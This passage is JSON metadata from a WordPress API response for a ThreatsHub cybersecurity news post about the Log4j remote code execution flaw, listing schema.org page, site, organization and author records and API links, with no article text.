News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/the-latest-on-the-log4j-remote-code-execution-nightmare\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/the-latest-on-the-log4j-remote-code-execution-nightmare\/#primaryimage"},"thumbnailUrl":"https:\/\/pubads.g.doubleclick.net\/gampad\/ad?co=1&amp;iu=\/6978\/reg_security\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=2&amp;c=2YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D2%26raptor%3Dcondor%26pos%3Dtop%26test%3D0","datePublished":"2021-12-14T15:24:59+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/the-latest-on-the-log4j-remote-code-execution-nightmare\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/the-latest-on-the-log4j-remote-code-execution-nightmare\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/the-latest-on-the-log4j-remote-code-execution-nightmare\/#primaryimage","url":"https:\/\/pubads.g.doubleclick.net\/gampad\/ad?co=1&amp;iu=\/6978\/reg_security\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=2&amp;c=2YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D2%26raptor%3Dcondor%26pos%3Dtop%26test%3D0","contentUrl":"https:\/\/pubads.g.doubleclick.net\/gampad\/ad?co=1&amp;iu=\/6978\/reg_security\/front&amp;sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&amp;tile=2&amp;c=2YbkW913@dOpDhTAYvphm3wAAAMo&amp;t=ct%3Dns%26unitnum%3D2%26raptor%3Dcondor%26pos%3Dtop%26test%3D0"},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/the-latest-on-the-log4j-remote-code-execution-nightmare\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"headline,hacker,data loss,flaw,java,apache","item":"https:\/\/www.threatshub.org\/blog\/tag\/headlinehackerdata-lossflawjavaapache\/"},{"@type":"ListItem","position":3,"name":"The Latest On The Log4j Remote Code Execution Nightmare"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/44427","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=44427"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/44427\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=44427"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=44427"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=44427"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}